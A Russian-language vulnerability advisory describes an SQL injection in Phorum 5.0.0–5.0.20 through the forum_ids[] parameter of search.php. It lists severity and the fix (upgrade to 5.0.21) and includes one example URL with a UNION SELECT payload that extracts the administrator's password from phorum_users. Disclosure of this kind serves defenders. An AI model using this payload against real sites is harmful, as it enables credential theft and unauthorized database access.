SQL-инъекция в Phorum

Дата публикации:	08.11.2005
Дата изменения:	17.10.2006
Всего просмотров:	2134
Опасность:	Средняя
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:	Удаленная
Воздействие:	Неавторизованное изменение данных
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	Phorum 5.x
	Уязвимые версии: Phorum 5.0.0 – 5.0.20 Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре “forum_ids[]” сценария “search.php”. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: http://localhost/phorum520/search.php?1,search=a, page=1,match_type=ALL,match_dates=30,match_ forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99) //UNION//ALL//SELECT//1,password,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,21,32//FROM//phorum_users //WHERE//admin=1//LIMIT//1/* Для удачной эксплуатации уязвимости, опция register_globals должна быть включена. URL производителя: phorum.org Решение: Установите последнюю версию (5.0.21) с сайта производителя. phorum.org/downloads/phorum-5.0.21.tar.gz Источник:
Ссылки:	Sql injection in Phorum 5.0.20 and earlier

SQL-инъекция в Phorum

Подпишитесь на email рассылку